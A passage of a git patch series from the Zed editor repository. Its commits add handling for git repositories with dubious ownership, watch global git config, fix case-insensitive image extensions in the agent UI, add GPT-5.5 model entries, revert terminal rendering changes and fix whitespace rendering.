.child(Label::new(label).size(LabelSize::Small).color(Color::Muted)) - .when(has_no_repo && worktree_count > 0, |this| { - this.child( - panel_filled_button("Initialize Repository") - .tooltip(Tooltip::for_action_title_in( - "git init", - &git::Init, - &self.focus_handle, - )) - .on_click(move |_, _, cx| { - cx.defer(move |cx| { - cx.dispatch_action(&git::Init); - }) - }), - ) - }) - .when(should_show_branch_diff, |this| { - this.child( - panel_filled_button("View Branch Diff") - .tooltip(move |_, cx| { - Tooltip::with_meta( - "Branch Diff", - Some(&BranchDiff), - "Show diff between working directory and default branch", - cx, - ) + .text_color(Color::Placeholder.color(cx)) + .children(children) + } + + fn render_no_changes_ui(&self, cx: &Context) -> Vec { + let mut elements: Vec = vec!["No changes to commit".into_any_element()]; + + if self.changes_count == 0 && !self.is_on_main_branch(cx) { + elements.push( + panel_filled_button("View Branch Diff") + .tooltip(move |_, cx| { + Tooltip::with_meta( + "Branch Diff", + Some(&BranchDiff), + "Show diff between working directory and default branch", + cx, + ) + }) + .on_click(move |_, _, cx| { + cx.defer(move |cx| { + cx.dispatch_action(&BranchDiff); }) - .on_click(move |_, _, cx| { - cx.defer(move |cx| { - cx.dispatch_action(&BranchDiff); - }) - }), + }) + .into_any_element(), + ); + } + + elements + } + + fn render_unsafe_repo_ui( + &self, + active_repository: &Entity, + cx: &mut Context, + ) -> Vec { + let directory = active_repository.update(cx, |repository, _cx| { + repository.snapshot().work_directory_abs_path + }); + + let message = format!( + "Detected dubious ownership in repository at {}. \ + This happens when the .git/ directory is not owned by the current user. 
\ + If you want to learn more about safe directories, visit git's documentation.", + directory.display() + ); + + vec![ + div() + .self_stretch() + .px_4() + .text_center() + .child(Label::new(message).color(Color::Muted)) + .into_any_element(), + self.render_unsafe_repo_buttons(directory, cx) + .into_any_element(), + ] + } + + fn render_unsafe_repo_buttons(&self, directory: Arc, cx: &mut Context) -> Div { + h_flex() + .max_w_full() + .gap_2() + .justify_center() + .child( + panel_filled_button("Trust Directory") + .end_icon(Icon::new(IconName::Check).size(IconSize::Small)) + .tooltip(Tooltip::text( + format!("git config --global --add safe.directory {}", directory.display()) + )) + .on_click( + cx.listener(|this, _, window, cx| { + this.add_safe_directory(window, cx); + }) ) - }) + ) + .child( + panel_filled_button("Learn More") + .end_icon(Icon::new(IconName::Link).size(IconSize::Small)) + .tooltip(Tooltip::text("Open https://git-scm.com/docs/git-config#Documentation/git-config.txt-safedirectory in your default browser")) + .on_click(move |_, _, cx| cx.open_url("https://git-scm.com/docs/git-config#Documentation/git-config.txt-safedirectory")) + ) + } + + fn render_uninitialized_ui(&self, cx: &mut Context) -> Vec { + let worktree_count = self.project.read(cx).visible_worktrees(cx).count(); + if worktree_count > 0 && self.active_repository.is_none() { + vec![ + "No Git Repositories".into_any_element(), + panel_filled_button("Initialize Repository") + .tooltip(Tooltip::for_action_title_in( + "git init", + &git::Init, + &self.focus_handle, + )) + .on_click(move |_, _, cx| { + cx.defer(move |cx| { + cx.dispatch_action(&git::Init); + }) + }) + .into_any_element(), + ] + } else { + vec![] + } } fn is_on_main_branch(&self, cx: &Context) -> bool { @@ -4741,7 +4878,7 @@ impl GitPanel { let is_staging_or_staged = repo .pending_ops_for_path(&repo_path) - .map(|ops| ops.staging() || ops.staged()) + .map(|ops| !ops.last_op_errored() && (ops.staging() || ops.staged())) 
.or_else(|| { repo.status_for_path(&repo_path) .and_then(|status| status.status.staging().as_bool()) diff --git a/crates/project/src/git_store.rs b/crates/project/src/git_store.rs index 71eaca61cfd32c..a6d963bd111beb 100644 --- a/crates/project/src/git_store.rs +++ b/crates/project/src/git_store.rs @@ -54,6 +54,7 @@ use language::{ proto::{deserialize_version, serialize_version}, }; use parking_lot::Mutex; +use paths::{config_dir, home_dir}; use pending_op::{PendingOp, PendingOpId, PendingOps, PendingOpsSummary}; use postage::stream::Stream as _; use rpc::{ @@ -163,12 +164,29 @@ enum DiffKind { SinceOid(Option), } +#[derive(Debug, Default, Clone, Copy)] +pub enum GitAccess { + /// Either: + /// - the user owns `.git` + /// - the user doesn't own `.git`, but has both of: + /// - OS-level read permissions + /// - the directory is marked as safe (git config safe.directory) + #[default] + Yes, + + /// The user is not the owner of `.git`, and one of the following is true: + /// - the directory is not marked as safe (git config safe.directory) + /// - the user does not have OS-level read permissions to `.git` + No, +} + enum GitStoreState { Local { next_repository_id: Arc, downstream: Option, project_environment: Entity, fs: Arc, + _fs_watches: Box<[Task<()>]>, }, Remote { upstream_client: AnyProtoClient, @@ -362,6 +380,14 @@ pub struct Repository { initial_graph_data: HashMap<(LogSource, LogOrder), InitialGitGraphData>, commit_data_handler: CommitDataHandlerState, commit_data: HashMap, + refetch_repo_state: Arc< + dyn Fn( + &mut Context, + ) -> ( + mpsc::UnboundedSender, + Shared>>, + ), + >, } impl std::ops::Deref for Repository { @@ -465,6 +491,7 @@ pub enum GitStoreEvent { IndexWriteError(anyhow::Error), JobsUpdated, ConflictsUpdated, + GlobalConfigurationUpdated, } impl EventEmitter for Repository {} @@ -492,6 +519,43 @@ impl GitStore { fs: Arc, cx: &mut Context, ) -> Self { + let _fs_watches = if fs.is_fake() { + Box::new([]) + } else { + [ + 
config_dir().join("git/config"), + home_dir().join(".gitconfig"), + ] + .into_iter() + .map(|path| { + let fs = fs.clone(); + + cx.spawn(async move |this, cx| { + let watcher = fs.watch(&path, Duration::from_millis(100)); + let (mut watcher, _) = watcher.await; + while let Some(_) = watcher.next().await { + let Ok(_) = this.update(cx, |this, cx| { + for repo in this.repositories.values() { + repo.update(cx, |this, cx| { + if this.job_sender.is_closed() { + let (job_sender, state) = (this.refetch_repo_state)(cx); + this.repository_state = state; + this.job_sender = job_sender; + this.schedule_scan(None, cx); + } + }) + } + cx.emit(GitStoreEvent::GlobalConfigurationUpdated); + }) else { + return; + }; + } + }) + }) + .collect::>() + .into_boxed_slice() + }; + Self::new( worktree_store.clone(), buffer_store, @@ -499,6 +563,7 @@ impl GitStore { next_repository_id: Arc::new(AtomicU64::new(1)), downstream: None, project_environment: environment, + _fs_watches, fs, }, cx, @@ -1386,6 +1451,7 @@ impl GitStore { downstream, next_repository_id, fs, + .. } = &self.state else { return; @@ -1931,7 +1997,7 @@ impl GitStore { GitStoreState::Local { fs, .. } => { let fs = fs.clone(); cx.background_executor() - .spawn(async move { fs.git_clone(&repo, &path).await }) + .spawn(async move { fs.git_clone(&path, &repo).await }) } GitStoreState::Remote { upstream_client, @@ -1961,6 +2027,31 @@ impl GitStore { } } + pub fn git_config(&self, path: Arc, args: Vec, cx: &App) -> Task> { + match &self.state { + GitStoreState::Local { fs, .. } => { + let fs = fs.clone(); + cx.background_executor() + .spawn(async move { fs.git_config(&path, args).await }) + } + GitStoreState::Remote { + upstream_client, .. + } => { + // Prevent running git config commands for collab. + if upstream_client.is_via_collab() { + return Task::ready(Err(anyhow!( + "Git Config isn't support for project guests" + ))); + } + + // TODO: Implement this for remote repositories. 
+ Task::ready(Err(anyhow!( + "Git Config isn't yet supported for remote projects" + ))) + } + } + } + async fn handle_update_repository( this: Entity, envelope: TypedEnvelope, @@ -4189,27 +4280,38 @@ impl Repository { Some(original_repo_abs_path), PathStyle::local(), ); - let state = cx - .spawn(async move |_, cx| { - LocalRepositoryState::new( - work_directory_abs_path, - dot_git_abs_path, - project_environment, - fs, - is_trusted, - cx, - ) - .await - .map_err(|err| err.to_string()) - }) - .shared(); - let job_sender = Repository::spawn_local_git_worker(state.clone(), cx); - let state = cx - .spawn(async move |_, _| { - let state = state.await?; - Ok(RepositoryState::Local(state)) - }) - .shared(); + let refetch_repo_state = Arc::new(move |cx: &mut Context| { + let work_directory_abs_path = work_directory_abs_path.clone(); + let dot_git_abs_path = dot_git_abs_path.clone(); + let project_environment = project_environment.clone(); + let fs = fs.clone(); + + let state = cx + .spawn(async move |_, cx| { + LocalRepositoryState::new( + work_directory_abs_path, + dot_git_abs_path, + project_environment, + fs, + is_trusted, + cx, + ) + .await + .map_err(|err| err.to_string()) + }) + .shared(); + let job_sender = Repository::spawn_local_git_worker(state.clone(), cx); + let state = cx + .spawn(async move |_, _| { + let state = state.await?; + Ok(RepositoryState::Local(state)) + }) + .shared(); + + (job_sender, state) + }); + + let (job_sender, state) = (refetch_repo_state)(cx); // todo(git_graph_remote): Make this subscription on both remote/local repo cx.subscribe_self(move |this, event: &RepositoryEvent, _| match event { @@ -4244,6 +4346,7 @@ impl Repository { initial_graph_data: Default::default(), commit_data: Default::default(), commit_data_handler: CommitDataHandlerState::Closed, + refetch_repo_state, } } @@ -4263,9 +4366,18 @@ impl Repository { original_repo_abs_path, path_style, ); - let repository_state = RemoteRepositoryState { project_id, client }; - let 
job_sender = Self::spawn_remote_git_worker(repository_state.clone(), cx); - let repository_state = Task::ready(Ok(RepositoryState::Remote(repository_state))).shared(); + let refetch_repo_state = Arc::new(move |cx: &mut Context| { + let repository_state = RemoteRepositoryState { + project_id, + client: client.clone(), + }; + let job_sender = Self::spawn_remote_git_worker(repository_state.clone(), cx); + let repository_state = + Task::ready(Ok(RepositoryState::Remote(repository_state))).shared(); + (job_sender, repository_state) + }); + + let (job_sender, repository_state) = (refetch_repo_state)(cx); Self { this: cx.weak_entity(), snapshot, @@ -4282,6 +4394,7 @@ impl Repository { initial_graph_data: Default::default(), commit_data: Default::default(), commit_data_handler: CommitDataHandlerState::Closed, + refetch_repo_state, } } @@ -5545,8 +5658,9 @@ impl Repository { snapshot .status() .filter_map(|entry| { - if let Some(ops) = - pending_ops.get(&PathKey(entry.repo_path.as_ref().clone()), ()) + if let Some(ops) = pending_ops + .get(&PathKey(entry.repo_path.as_ref().clone()), ()) + .filter(|ops| !ops.last_op_errored()) { if ops.staging() || ops.staged() { None @@ -5578,8 +5692,9 @@ impl Repository { snapshot .status() .filter_map(|entry| { - if let Some(ops) = - pending_ops.get(&PathKey(entry.repo_path.as_ref().clone()), ()) + if let Some(ops) = pending_ops + .get(&PathKey(entry.repo_path.as_ref().clone()), ()) + .filter(|ops| !ops.last_op_errored()) { if !ops.staging() && !ops.staged() { None @@ -7588,6 +7703,23 @@ impl Repository { self.pending_ops.edit(edits, ()); ids } + + pub fn access(&mut self, _cx: &App) -> oneshot::Receiver { + self.send_job(None, move |git_repo, _cx| async move { + match git_repo { + // TODO: Correctly handle remote repositories, where the user + // that's running the Zed remote may not own the `.git/` + // directory. For now we just return `GitAccess::Yes` so that + // remoting continues working as expected. + RepositoryState::Remote(..) 
=> GitAccess::Yes, + RepositoryState::Local(state) => match state.backend.status(&[]).await { + Ok(_) => GitAccess::Yes, + Err(_) => GitAccess::No, + }, + } + }) + } + pub fn default_remote_url(&self) -> Option { self.remote_upstream_url .clone() diff --git a/crates/project/src/git_store/pending_op.rs b/crates/project/src/git_store/pending_op.rs index 1991eed407833d..269e17a4d4dc45 100644 --- a/crates/project/src/git_store/pending_op.rs +++ b/crates/project/src/git_store/pending_op.rs @@ -130,6 +130,12 @@ impl PendingOps { } false } + + /// Checks whether the last operation in the pending operations resulted in + /// an error. + pub fn last_op_errored(&self) -> bool { + self.ops.last().is_some_and(PendingOp::error) + } } impl PendingOp { diff --git a/crates/project/src/project.rs b/crates/project/src/project.rs index c0b39c33dd7263..af15ab445175e5 100644 --- a/crates/project/src/project.rs +++ b/crates/project/src/project.rs @@ -6036,6 +6036,10 @@ impl Project { .git_init(path, fallback_branch_name, cx) } + pub fn git_config(&self, path: Arc, args: Vec, cx: &App) -> Task> { + self.git_store.read(cx).git_config(path, args, cx) + } + pub fn buffer_store(&self) -> &Entity { &self.buffer_store } From 8b1d45083c2858c7b724e892ad8bb8684c828640 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Tom=20Houl=C3=A9?= <13155277+tomhoule@users.noreply.github.com> Date: Fri, 24 Apr 2026 20:30:54 +0200 Subject: [PATCH 026/231] agent_ui: Recognize image file extensions case insensitively (#54786) Straightforward. Closes https://github.com/zed-industries/zed/issues/54308 Release Notes: - Fixed the file extension recognition logic for images in the agent UI being case sensitive. It is now case insensitive. 
--- crates/agent_ui/src/mention_set.rs | 44 ++++++++++++++++++++++++------ 1 file changed, 35 insertions(+), 9 deletions(-) diff --git a/crates/agent_ui/src/mention_set.rs b/crates/agent_ui/src/mention_set.rs index f62181c9f3d3e8..8c98b9458bbce8 100644 --- a/crates/agent_ui/src/mention_set.rs +++ b/crates/agent_ui/src/mention_set.rs @@ -211,10 +211,7 @@ impl MentionSet { ); let crease = if let MentionUri::File { abs_path } = &mention_uri - && let Some(extension) = abs_path.extension() - && let Some(extension) = extension.to_str() - && Img::extensions().contains(&extension) - && !extension.contains("svg") + && is_raster_image_path(abs_path) { let Some(project_path) = project .read(cx) @@ -343,12 +340,8 @@ impl MentionSet { else { return Task::ready(Err(anyhow!("project path not found"))); }; - let extension = abs_path - .extension() - .and_then(OsStr::to_str) - .unwrap_or_default(); - if Img::extensions().contains(&extension) && !extension.contains("svg") { + if is_raster_image_path(&abs_path) { if !supports_images { return Task::ready(Err(anyhow!("This model does not support images yet"))); } @@ -723,6 +716,25 @@ mod tests { other => panic!("Expected selection mention to resolve as text, got {other:?}"), } } + + #[test] + fn test_is_raster_image_path_is_case_insensitive() { + // Regression test for #54308: drag-and-dropping a file whose extension + // is uppercase (e.g. `.PNG`) used to be treated as a non-image file. + assert!(is_raster_image_path(Path::new("/tmp/image.png"))); + assert!(is_raster_image_path(Path::new("/tmp/image.PNG"))); + assert!(is_raster_image_path(Path::new("/tmp/image.Png"))); + assert!(is_raster_image_path(Path::new("/tmp/photo.JPEG"))); + assert!(is_raster_image_path(Path::new("/tmp/animation.GIF"))); + + // SVG is handled via a different code path and must not be reported here. 
+ assert!(!is_raster_image_path(Path::new("/tmp/icon.svg"))); + assert!(!is_raster_image_path(Path::new("/tmp/icon.SVG"))); + + // Non-image extensions and paths with no extension. + assert!(!is_raster_image_path(Path::new("/tmp/notes.txt"))); + assert!(!is_raster_image_path(Path::new("/tmp/README"))); + } } /// Inserts a list of images into the editor as context mentions. @@ -846,6 +858,20 @@ fn image_format_from_external_content(format: image::ImageFormat) -> Option bool { + let Some(extension) = path.extension().and_then(OsStr::to_str) else { + return false; + }; + if extension.eq_ignore_ascii_case("svg") { + return false; + } + Img::extensions() + .iter() + .any(|known| known.eq_ignore_ascii_case(extension)) +} + pub(crate) fn load_external_image_from_path( path: &Path, default_name: &SharedString, From af837f5b1f4a5e5bba2744138e4236151f813e40 Mon Sep 17 00:00:00 2001 From: Cole Miller Date: Fri, 24 Apr 2026 15:04:32 -0400 Subject: [PATCH 027/231] Update AI rules to reflect that `AsyncApp` updates are now infallible (#54818) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - N/A --- .rules | 2 -- 1 file changed, 2 deletions(-) diff --git a/.rules b/.rules index 67179a9f472ef7..4b4eb08c368a33 100644 --- a/.rules +++ b/.rules @@ -63,8 +63,6 @@ Within the closures, the inner `cx` provided to the closure must be used instead Trying to update an entity while it's already being updated must be avoided as this will cause a panic. -When `read_with`, `update`, or `update_in` are used with an async context, the closure's return value is wrapped in an `anyhow::Result`. - `WeakEntity` is a weak handle. 
It has `read_with`, `update`, and `update_in` methods that work the same, but always return an `anyhow::Result` so that they can fail if the entity no longer exists. This can be useful to avoid memory leaks - if entities have mutually recursive handles to each other they will never be dropped. ## Concurrency From e22fd9b652e8fde0da27fcc116bf63c3ac722062 Mon Sep 17 00:00:00 2001 From: Max Malkin <60683392+maxmalkin@users.noreply.github.com> Date: Fri, 24 Apr 2026 13:05:42 -0600 Subject: [PATCH 028/231] Fall back to empty workspace when devcontainer restore is cancelled (#54734) Closes #47872 Release Notes: - Fixed Zed exiting on startup when cancelling a failed devcontainer connection. It now falls back to an empty workspace. Co-authored-by: KyleBarton --- crates/zed/src/main.rs | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) diff --git a/crates/zed/src/main.rs b/crates/zed/src/main.rs index 234179f9a53b7a..9141fe1aa8ae31 100644 --- a/crates/zed/src/main.rs +++ b/crates/zed/src/main.rs @@ -1469,6 +1469,31 @@ pub(crate) async fn restore_or_create_workspace( .await?; } } + + // If the user cancelled a failed remote connection at startup, + // open_remote_project returns Ok but removes the window, so error_count + // stays 0 and the toast fallback above does not trigger. Without this + // check, Zed would exit silently. 
+ if cx.update(|cx| cx.windows().is_empty()) { + cx.update(|cx| { + workspace::open_new( + Default::default(), + app_state.clone(), + cx, + |workspace, window, cx| { + let restore_on_startup = + WorkspaceSettings::get_global(cx).restore_on_startup; + match restore_on_startup { + workspace::RestoreOnStartupBehavior::Launchpad => {} + _ => { + Editor::new_file(workspace, &Default::default(), window, cx); + } + } + }, + ) + }) + .await?; + } } else if matches!(kvp.read_kvp(FIRST_OPEN), Ok(None)) { cx.update(|cx| show_onboarding_view(app_state, cx)).await?; } else { From 5d4ff7d6435f9e6beb3ba941ec2f4fecc8b436a4 Mon Sep 17 00:00:00 2001 From: Bennet Bo Fenner Date: Fri, 24 Apr 2026 22:26:56 +0200 Subject: [PATCH 029/231] open_ai: Add support for gpt-5.5 (#54820) Release Notes: - Added support for GPT 5.5 and GPT 5.5 Pro via the OpenAI provider --- .../language_models/src/provider/open_ai.rs | 2 ++ crates/open_ai/src/open_ai.rs | 23 +++++++++++++++++-- 2 files changed, 23 insertions(+), 2 deletions(-) diff --git a/crates/language_models/src/provider/open_ai.rs b/crates/language_models/src/provider/open_ai.rs index 97bb5ef1e4d64b..c018a8da424fd2 100644 --- a/crates/language_models/src/provider/open_ai.rs +++ b/crates/language_models/src/provider/open_ai.rs @@ -327,6 +327,8 @@ impl LanguageModel for OpenAiLanguageModel { | Model::FivePointThreeCodex | Model::FivePointFour | Model::FivePointFourPro + | Model::FivePointFive + | Model::FivePointFivePro | Model::O1 | Model::O3 => true, Model::ThreePointFiveTurbo | Model::Four | Model::FourTurbo | Model::O3Mini => false, diff --git a/crates/open_ai/src/open_ai.rs b/crates/open_ai/src/open_ai.rs index cc54d20a91568d..e555235b993fd3 100644 --- a/crates/open_ai/src/open_ai.rs +++ b/crates/open_ai/src/open_ai.rs @@ -95,6 +95,10 @@ pub enum Model { FivePointFour, #[serde(rename = "gpt-5.4-pro")] FivePointFourPro, + #[serde(rename = "gpt-5.5")] + FivePointFive, + #[serde(rename = "gpt-5.5-pro")] + FivePointFivePro, #[serde(rename = 
"custom")] Custom { name: String, @@ -144,6 +148,8 @@ impl Model { "gpt-5.3-codex" => Ok(Self::FivePointThreeCodex), "gpt-5.4" => Ok(Self::FivePointFour), "gpt-5.4-pro" => Ok(Self::FivePointFourPro), + "gpt-5.5" => Ok(Self::FivePointFive), + "gpt-5.5-pro" => Ok(Self::FivePointFivePro), invalid_id => anyhow::bail!("invalid model id '{invalid_id}'"), } } @@ -168,6 +174,8 @@ impl Model { Self::FivePointThreeCodex => "gpt-5.3-codex", Self::FivePointFour => "gpt-5.4", Self::FivePointFourPro => "gpt-5.4-pro", + Self::FivePointFive => "gpt-5.5", + Self::FivePointFivePro => "gpt-5.5-pro", Self::Custom { name, .. } => name, } } @@ -192,6 +200,8 @@ impl Model { Self::FivePointThreeCodex => "gpt-5.3-codex", Self::FivePointFour => "gpt-5.4", Self::FivePointFourPro => "gpt-5.4-pro", + Self::FivePointFive => "gpt-5.5", + Self::FivePointFivePro => "gpt-5.5-pro", Self::Custom { display_name, .. } => display_name.as_deref().unwrap_or(&self.id()), } } @@ -216,6 +226,8 @@ impl Model { Self::FivePointThreeCodex => 400_000, Self::FivePointFour => 1_050_000, Self::FivePointFourPro => 1_050_000, + Self::FivePointFive => 1_050_000, + Self::FivePointFivePro => 1_050_000, Self::Custom { max_tokens, .. } => *max_tokens, } } @@ -243,6 +255,8 @@ impl Model { Self::FivePointThreeCodex => Some(128_000), Self::FivePointFour => Some(128_000), Self::FivePointFourPro => Some(128_000), + Self::FivePointFive => Some(128_000), + Self::FivePointFivePro => Some(128_000), } } @@ -251,7 +265,9 @@ impl Model { Self::Custom { reasoning_effort, .. 
} => reasoning_effort.to_owned(), - Self::FivePointThreeCodex | Self::FivePointFourPro => Some(ReasoningEffort::Medium), + Self::FivePointThreeCodex | Self::FivePointFourPro | Self::FivePointFivePro => { + Some(ReasoningEffort::Medium) + } _ => None, } } @@ -265,7 +281,8 @@ impl Model { Self::FiveCodex | Self::FivePointTwoCodex | Self::FivePointThreeCodex - | Self::FivePointFourPro => false, + | Self::FivePointFourPro + | Self::FivePointFivePro => false, _ => true, } } @@ -289,6 +306,8 @@ impl Model { | Self::FivePointThreeCodex | Self::FivePointFour | Self::FivePointFourPro + | Self::FivePointFive + | Self::FivePointFivePro | Self::FiveNano => true, Self::O1 | Self::O3 | Self::O3Mini | Model::Custom { .. } => false, } From 1c8bc1afae2afd4d03e18f89697a5c87018c6999 Mon Sep 17 00:00:00 2001 From: Bennet Bo Fenner Date: Sat, 25 Apr 2026 00:16:20 +0200 Subject: [PATCH 030/231] Revert terminal changes from #54728 (#54836) Reverts parts of #54728, which seems to have causes scrolling issues in the terminal Release Notes: - N/A --- crates/terminal_view/src/terminal_element.rs | 28 ++++++++++---------- 1 file changed, 14 insertions(+), 14 deletions(-) diff --git a/crates/terminal_view/src/terminal_element.rs b/crates/terminal_view/src/terminal_element.rs index dc1b63fb09a7c5..1e07e1c49d43ac 100644 --- a/crates/terminal_view/src/terminal_element.rs +++ b/crates/terminal_view/src/terminal_element.rs @@ -185,14 +185,15 @@ impl LayoutRect { let position = { let alac_point = self.point; point( - origin.x + alac_point.column as f32 * dimensions.cell_width, + (origin.x + alac_point.column as f32 * dimensions.cell_width).floor(), origin.y + alac_point.line as f32 * dimensions.line_height, ) }; - let size = size( - dimensions.cell_width * self.num_of_cells as f32, + let size = point( + (dimensions.cell_width * self.num_of_cells as f32).ceil(), dimensions.line_height, - ); + ) + .into(); window.paint_quad(fill(Bounds::new(position, size), self.color)); } @@ -958,15 +959,13 @@ impl 
Element for TerminalElement { let (dimensions, line_height_px) = { let rem_size = window.rem_size(); let font_pixels = text_style.font_size.to_pixels(rem_size); - let line_height = window.pixel_snap(px(f32::from(font_pixels) * line_height)); + let line_height = f32::from(font_pixels) * line_height; let font_id = cx.text_system().resolve_font(&text_style.font()); - let cell_width = window.pixel_snap( - text_system - .advance(font_id, font_pixels, 'm') - .unwrap() - .width, - ); + let cell_width = text_system + .advance(font_id, font_pixels, 'm') + .unwrap() + .width; gutter = cell_width; let mut size = bounds.size; @@ -983,7 +982,7 @@ impl Element for TerminalElement { origin.x += gutter; ( - TerminalBounds::new(line_height, cell_width, Bounds { origin, size }), + TerminalBounds::new(px(line_height), cell_width, Bounds { origin, size }), line_height, ) }; @@ -1094,9 +1093,10 @@ impl Element for TerminalElement { // internal line number (which can be negative in Scrollable mode for // scrollback history). let rows_above_viewport = - ((intersection.top() - bounds.top()).max(px(0.)) / line_height_px) as usize; + f32::from((intersection.top() - bounds.top()).max(px(0.)) / line_height_px) + as usize; let visible_row_count = - (intersection.size.height / line_height_px).ceil() as usize + 1; + f32::from((intersection.size.height / line_height_px).ceil()) as usize + 1; TerminalElement::layout_grid( // Group cells by line and filter to only the visible screen rows. 
From 46613384224520363ea8f533cf4a7573ce97dae1 Mon Sep 17 00:00:00 2001 From: Kirill Bulatov Date: Sat, 25 Apr 2026 09:11:27 +0300 Subject: [PATCH 031/231] Fix whitespace rendering in Zed (#54798) Closes https://github.com/zed-industries/zed/issues/49186 first Closes https://github.com/zed-industries/zed/issues/45775 second Release Notes: - Fixed whitespace rendering in Zed --- crates/editor/src/element.rs | 98 ++++++++++++++++++++++++++++-------- 1 file changed, 78 insertions(+), 20 deletions(-) diff --git a/crates/editor/src/element.rs b/crates/editor/src/element.rs index c52a0d76bdbc47..d980984c721c86 100644 --- a/crates/editor/src/element.rs +++ b/crates/editor/src/element.rs @@ -8963,6 +8963,10 @@ impl LineWithInvisibles { let mut layouts = Vec::with_capacity(max_line_count); let mut fragments: SmallVec<[LineFragment; 1]> = SmallVec::new(); let mut line = String::new(); + // Byte offset into the logical line used to position invisible markers. + // Unlike `line`, this is not cleared when we flush `shape_line` for + // mid-line inlays/replacements, so marker offsets stay correct in that case. 
+ let mut line_byte_offset: usize = 0; let mut invisibles = Vec::new(); let mut width = Pixels::ZERO; let mut len = 0; @@ -9036,6 +9040,7 @@ impl LineWithInvisibles { width += size.width; len += highlighted_chunk.text.len(); + line_byte_offset += highlighted_chunk.text.len(); fragments.push(LineFragment::Element { id: renderer.id, element: Some(element), @@ -9065,6 +9070,7 @@ impl LineWithInvisibles { width += line_layout.width; len += highlighted_chunk.text.len(); + line_byte_offset += highlighted_chunk.text.len(); fragments.push(LineFragment::Text(line_layout)) } } @@ -9095,6 +9101,7 @@ impl LineWithInvisibles { }); line.clear(); + line_byte_offset = 0; styles.clear(); row += 1; line_exceeded_max_len = false; @@ -9136,8 +9143,8 @@ impl LineWithInvisibles { if highlighted_chunk.is_tab { if non_whitespace_added || !is_soft_wrapped { invisibles.push(Invisible::Tab { - line_start_offset: line.len(), - line_end_offset: line.len() + line_chunk.len(), + line_start_offset: line_byte_offset, + line_end_offset: line_byte_offset + line_chunk.len(), }); } } else { @@ -9149,7 +9156,10 @@ impl LineWithInvisibles { && (non_whitespace_added || !is_soft_wrapped) { Some(Invisible::Whitespace { - line_offset: line.len() + index, + line_start_offset: line_byte_offset + index, + line_end_offset: line_byte_offset + + index + + c.len_utf8(), }) } else { None @@ -9160,6 +9170,7 @@ impl LineWithInvisibles { } line.push_str(line_chunk); + line_byte_offset += line_chunk.len(); } } } @@ -9431,15 +9442,23 @@ impl LineWithInvisibles { line_start_offset, line_end_offset, } => (*line_start_offset, *line_end_offset, &layout.tab_invisible), - Invisible::Whitespace { line_offset } => { - (*line_offset, line_offset + 1, &layout.space_invisible) - } + Invisible::Whitespace { + line_start_offset, + line_end_offset, + } => ( + *line_start_offset, + *line_end_offset, + &layout.space_invisible, + ), }; - let x_offset: ScrollPixelOffset = self.x_for_index(token_offset).into(); + let token_x = 
self.x_for_index(token_offset); + // Center the marker inside the actual glyph's width so it lines up with + // proportional fonts instead of assuming a monospace `em_width` cell. + let glyph_width = (self.x_for_index(token_end_offset) - token_x).max(Pixels::ZERO); + let x_offset: ScrollPixelOffset = token_x.into(); let invisible_offset: ScrollPixelOffset = - ((layout.position_map.em_width - invisible_symbol.width).max(Pixels::ZERO) / 2.0) - .into(); + ((glyph_width - invisible_symbol.width).max(Pixels::ZERO) / 2.0).into(); let origin = content_origin + gpui::point( Pixels::from( @@ -9635,8 +9654,13 @@ enum Invisible { line_start_offset: usize, line_end_offset: usize, }, + /// A whitespace character (ASCII space or any other Unicode whitespace). + /// + /// Storing both offsets correctly accounts for multi-byte whitespace characters + /// such as U+00A0 NO-BREAK SPACE, keeping adjacency checks correct. Whitespace { - line_offset: usize, + line_start_offset: usize, + line_end_offset: usize, }, } @@ -11201,7 +11225,6 @@ impl Element for EditorElement { scroll_max, line_layouts, line_height, - em_width, em_advance, em_layout_width, snapshot, @@ -12085,7 +12108,6 @@ pub(crate) struct PositionMap { pub scroll_position: gpui::Point, pub scroll_pixel_position: gpui::Point, pub scroll_max: gpui::Point, - pub em_width: Pixels, pub em_advance: Pixels, pub em_layout_width: Pixels, pub visible_row_range: Range, @@ -13424,7 +13446,8 @@ mod tests { line_end_offset: TAB_SIZE as usize, }, Invisible::Whitespace { - line_offset: TAB_SIZE as usize, + line_start_offset: TAB_SIZE as usize, + line_end_offset: TAB_SIZE as usize + 1, }, Invisible::Tab { line_start_offset: TAB_SIZE as usize + 1, @@ -13435,10 +13458,12 @@ mod tests { line_end_offset: TAB_SIZE as usize * 3, }, Invisible::Whitespace { - line_offset: TAB_SIZE as usize * 3 + 1, + line_start_offset: TAB_SIZE as usize * 3 + 1, + line_end_offset: TAB_SIZE as usize * 3 + 2, }, Invisible::Whitespace { - line_offset: TAB_SIZE as 
usize * 3 + 3, + line_start_offset: TAB_SIZE as usize * 3 + 3, + line_end_offset: TAB_SIZE as usize * 3 + 4, }, ]; assert_eq!( @@ -13468,6 +13493,34 @@ mod tests { } } + #[gpui::test] + fn test_multibyte_whitespace_uses_utf8_byte_offsets(cx: &mut TestAppContext) { + init_test(cx, |s| { + s.defaults.show_whitespaces = Some(ShowWhitespaceSetting::All); + }); + + // Regression test for #49186. NBSP (U+00A0) is rendered via the invisible + // character `replacement` pipeline, which flushes the internal `line` + // scratch buffer mid-line. Any whitespace invisible that follows must use + // the absolute byte offset within the logical line (here: byte 4 for the + // trailing ASCII space), not an offset relative to the post-flush buffer. + let actual_invisibles = collect_invisibles_from_new_editor( + cx, + EditorMode::full(), + "a\u{00A0}b ", + px(500.0), + false, + ); + + assert_eq!( + actual_invisibles, + vec![Invisible::Whitespace { + line_start_offset: 4, + line_end_offset: 5, + }] + ); + } + #[gpui::test] fn test_invisibles_dont_appear_in_certain_editors(cx: &mut TestAppContext) { init_test(cx, |s| { @@ -13508,19 +13561,24 @@ mod tests { line_end_offset: tab_size as usize, }, Invisible::Whitespace { - line_offset: tab_size as usize + 3, + line_start_offset: tab_size as usize + 3, + line_end_offset: tab_size as usize + 4, }, Invisible::Whitespace { - line_offset: tab_size as usize + 4, + line_start_offset: tab_size as usize + 4, + line_end_offset: tab_size as usize + 5, }, Invisible::Whitespace { - line_offset: tab_size as usize + 5, + line_start_offset: tab_size as usize + 5, + line_end_offset: tab_size as usize + 6, }, Invisible::Whitespace { - line_offset: tab_size as usize + 6, + line_start_offset: tab_size as usize + 6, + line_end_offset: tab_size as usize + 7, }, 